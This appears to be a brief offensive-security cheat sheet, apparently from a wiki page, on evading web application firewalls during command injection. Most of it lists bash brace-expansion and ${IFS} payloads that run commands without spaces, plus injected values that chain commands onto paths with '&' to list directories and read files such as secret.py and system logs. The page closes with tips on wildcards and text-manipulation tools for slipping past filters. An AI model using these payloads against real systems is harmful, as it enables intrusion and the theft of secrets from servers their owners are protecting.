WAF

See Also:

Char Evasion 'spaces'

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

WAF Wars

  • The bash shell allows wildcards.

  • These can be helpful to run commands that may be blocked by the WAF.

  • There are many functions that can manipulate text.

  • Try looking at the man pages for iconv or cut.

Last updated

Was this helpful?